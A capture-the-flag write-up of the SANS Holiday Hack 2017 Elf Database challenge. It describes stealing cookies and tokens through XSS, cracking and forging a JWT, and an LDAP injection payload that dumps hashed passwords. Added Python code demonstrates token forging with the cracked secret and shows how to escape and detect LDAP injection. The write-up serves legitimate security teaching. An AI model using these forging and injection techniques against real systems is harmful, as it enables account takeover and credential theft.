If you have not read Part 1, read it here:
http://oxhat.blogspot.in/2018/01/sans-holiday-hack-2017-part-1.html
So this part is all about exploiting machines. Each challenge leads us to a page of the Great Book that answers our question of who was the actual culprit behind hurling those massive snowballs.
Challenge
8) Fetch the letter to Santa from the North Pole Elf Database at http://edb.northpolechristmastown.com. Who wrote the letter?
Running an nmap scan of the internal network from Alabaster's compromised system, we find the edb server.
We connect to Alabaster's machine again and use SSH port forwarding to port 80 to reach the web application.
We also edit our hosts file so that requests to edb.northpolechristmastown.com reach the forwarded port.
Now we can access the application.
Once we do this we can try logging in with Alabaster's credentials, but it doesn't work.
Looking at the intercepted requests, we see that there is a session value in the cookie. My target is to steal the victim's session cookie and replace our session value with it.
There is a client-side simulation of a victim, and we need to perform a phishing attack against it.
This is the password reset page
There is an XSS filter in place, so we need to write an XSS filter evasion payload to steal the cookie.
So our payload for the attack is
Now we send the forged password reset request to the victim.
On successful exploitation, we find the victim's cookie in our access.log.
At this point I tried replacing the session value with the stolen cookie value, but it did not work.
The source code of the home page revealed one more juicy piece of information. The victim stores an np-auth token in localStorage; if the token is present, the page sends it for validation, and if validation succeeds it logs into the application.
Let's modify the XSS payload to steal the np-auth token.
After successful exploitation, we find the np-auth token.
Decoding the JWT reveals the information we need to log in, and also what we must fix to make the token valid, for example the expiry date.
So let us first try cracking the np-auth token; for this we can use jwt-cracker.
jwt-cracker reveals that the secret key used for the JWT is 3lv3s.
Now that we have all the information, we need to do the following:
1. Modify the expiry date
2. Create a new np-auth token using the secret key
3. Add the np-auth token to our localStorage
We will write a small piece of code to do the first two tasks in one shot!
Executing the program gives us the JWT for our np-auth token.
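The three steps above work only because the HS256 secret is guessable: anyone who knows it can re-sign an edited payload, and exp enforcement on the server cannot tell a forged token from a legitimate one. The following is an added example (not the write-up's own program) that implements HS256 signing and server-side verification with the standard library, then shows why the stolen token fails as-is, why re-signing with the wrong secret fails, and why re-signing with the recovered secret 3lv3s passes. The claim names (uid, exp) and the timestamps are constructed for the example; the challenge token's real claims were whatever the decoded JWT showed.

```python
import base64
import hashlib
import hmac
import json

# Secret recovered by jwt-cracker in the write-up. The root weakness is that it is
# short enough to brute-force; a 256-bit random secret would make this step infeasible.
WEAK_SECRET = "3lv3s"


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def sign_hs256(claims: dict, secret: str) -> str:
    """Build a compact JWS (header.payload.signature) with HS256."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = (
        _b64url(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + _b64url(json.dumps(claims, separators=(",", ":")).encode())
    )
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url(sig)


def decode_unverified(token: str) -> dict:
    """What the write-up calls 'decoding the JWT': the payload is base64url, not encrypted."""
    return json.loads(_b64url_decode(token.split(".")[1]))


def verify_hs256(token: str, secret: str, now: float) -> tuple:
    """Server-side check: pin the algorithm, compare the MAC in constant time, then check exp."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
    except ValueError:
        return False, "malformed"
    header = json.loads(_b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        return False, "unexpected alg"  # never let the token choose the algorithm
    expected = hmac.new(secret.encode(), f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        return False, "bad signature"
    claims = json.loads(_b64url_decode(payload_b64))
    if "exp" not in claims or claims["exp"] <= now:
        return False, "expired"
    return True, "ok"


def demo(now: float = 1_700_000_000.0) -> dict:
    """Walk the write-up's three steps against the verifier; returns the verdict for each case."""
    # Constructed stand-in for the token exfiltrated from localStorage: valid MAC, already expired.
    stolen = sign_hs256({"uid": "alabaster.snowball", "exp": now - 3600}, WEAK_SECRET)
    results = {"stolen_as_is": verify_hs256(stolen, WEAK_SECRET, now)[1]}
    claims = decode_unverified(stolen)
    claims["exp"] = now + 86400  # step 1: move the expiry into the future
    # step 2 with a guessed secret: the MAC no longer matches, so exp alone gets nobody in
    results["resigned_wrong_secret"] = verify_hs256(sign_hs256(claims, "guess"), WEAK_SECRET, now)[1]
    # step 2 with the cracked secret: indistinguishable from a token the server issued itself
    results["resigned_known_secret"] = verify_hs256(sign_hs256(claims, WEAK_SECRET), WEAK_SECRET, now)[1]
    return results


if __name__ == "__main__":
    for case, verdict in demo().items():
        print(f"{case}: {verdict}")
```

The verifier above is doing everything right (algorithm pinning, constant-time comparison, expiry check) and still accepts the forged token, which is the point: the only effective mitigation is a secret that cannot be recovered offline, or an asymmetric algorithm so the verifying side never holds signing material.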
For the third task, we open the developer console and run JavaScript to store the generated np-auth value in localStorage.
After this we refresh the page, and bingo! We are in!
Through the proxy tool we find that the UI models are fetched over an XML call, which is then used to populate the UI of the page.
A few points to note here from the code:
1. We can search "beyond" the available options of Elf and Reindeer
2. To perform administrator operations, an administrator password is required
From the debug code we can understand that there is an LDAP application running behind the search.
I tried searching with well-known reindeer information, Rudolph, and then used blind injection techniques to figure out the password field; we found one field called userPassword, which revealed the password in hashed form.
Now if we try to log in with Santa's email and password, it won't work. Guess why? Because we are logged into Alabaster's account by setting an np-auth token, so we need to generate one more auth token with Santa's information.
So our final target is writing an LDAP injection query that bypasses the intended filter and lets me search any record whose 'ou' is anything, that is, *. One more thing we can infer from the message box: whenever I try to access the Santa Panel, I get the notification "You must be Claus to enter the Panel".
So I use the gn value "Claus" and ou = *.
Sending this request with the input claus*)(ou=*))(&(gn= and modifying the request slightly by adding the password field, I can dump all users' information with their hashed passwords.
Response:
Our next step is to recover the original value of Claus's hashed password, which is 001cookielips001.
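The injection above works because the search term is spliced into the LDAP filter string verbatim, so the parentheses in claus*)(ou=*))(&(gn= close the application's clause early and open the attacker's own. The following is an added example, not the Elf Database's code: it reconstructs a plausible filter template (an assumption, since the real template is not shown on the page), builds the filter both the vulnerable way and with RFC 4515 value escaping, and adds a simple detection check that flags any filter whose parentheses close before the end of the string.

```python
# Assumed shape of the server-side filter; the challenge's actual template is not on the page.
FILTER_TEMPLATE = "(&(gn={name}*)(ou={ou}))"

# The exact input used in the write-up.
PAGE_PAYLOAD = "claus*)(ou=*))(&(gn="

# RFC 4515 section 3: these characters must be hex-escaped inside an assertion value.
_RFC4515_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}


def escape_ldap_value(value: str) -> str:
    """Hex-escape every filter metacharacter so the input can only ever be matched literally."""
    return "".join(_RFC4515_ESCAPES.get(ch, ch) for ch in value)


def build_filter_vulnerable(name: str, ou: str) -> str:
    """String concatenation: user input becomes filter syntax."""
    return FILTER_TEMPLATE.format(name=name, ou=ou)


def build_filter_hardened(name: str, ou: str) -> str:
    """Same template, but every user-controlled value is escaped first."""
    return FILTER_TEMPLATE.format(name=escape_ldap_value(name), ou=escape_ldap_value(ou))


def is_single_filter(ldap_filter: str) -> bool:
    """Detection check: a well-formed filter is exactly one parenthesised expression.

    If the nesting depth returns to zero before the last character, the input closed the
    application's filter early and appended its own clauses (the shape of the page's payload).
    Escaped parens (\\28, \\29) contain no raw '(' or ')' and therefore do not affect depth.
    """
    if not ldap_filter.startswith("("):
        return False
    depth = 0
    last = len(ldap_filter) - 1
    for idx, ch in enumerate(ldap_filter):
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth < 0:
                return False
            if depth == 0 and idx != last:
                return False
    return depth == 0


def demo() -> dict:
    """Compare the page's payload and a benign search through both builders."""
    return {
        "benign": build_filter_vulnerable("Rudolph", "reindeer"),
        "vulnerable": build_filter_vulnerable(PAGE_PAYLOAD, "elf"),
        "hardened": build_filter_hardened(PAGE_PAYLOAD, "elf"),
        "vulnerable_is_single": is_single_filter(build_filter_vulnerable(PAGE_PAYLOAD, "elf")),
        "hardened_is_single": is_single_filter(build_filter_hardened(PAGE_PAYLOAD, "elf")),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

With the vulnerable builder the payload yields (&(gn=claus*)(ou=*))(&(gn=*)(ou=elf)), two expressions where the server expected one, and the first of them drops the ou restriction entirely. With escaping, the same input becomes a harmless literal search for a name nobody has. The is_single_filter check is useful as a last-line defence or as a log-review heuristic, but escaping (or an LDAP library that builds filters from structured arguments) is the actual fix.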
Once we generate a new token with the department set to 'administrator' and 'ou' set to *, and store it, refreshing the browser gives us a prompt. We need to provide the plaintext password here, which we obtained by cracking the hashed password.
And finally we can retrieve the letter.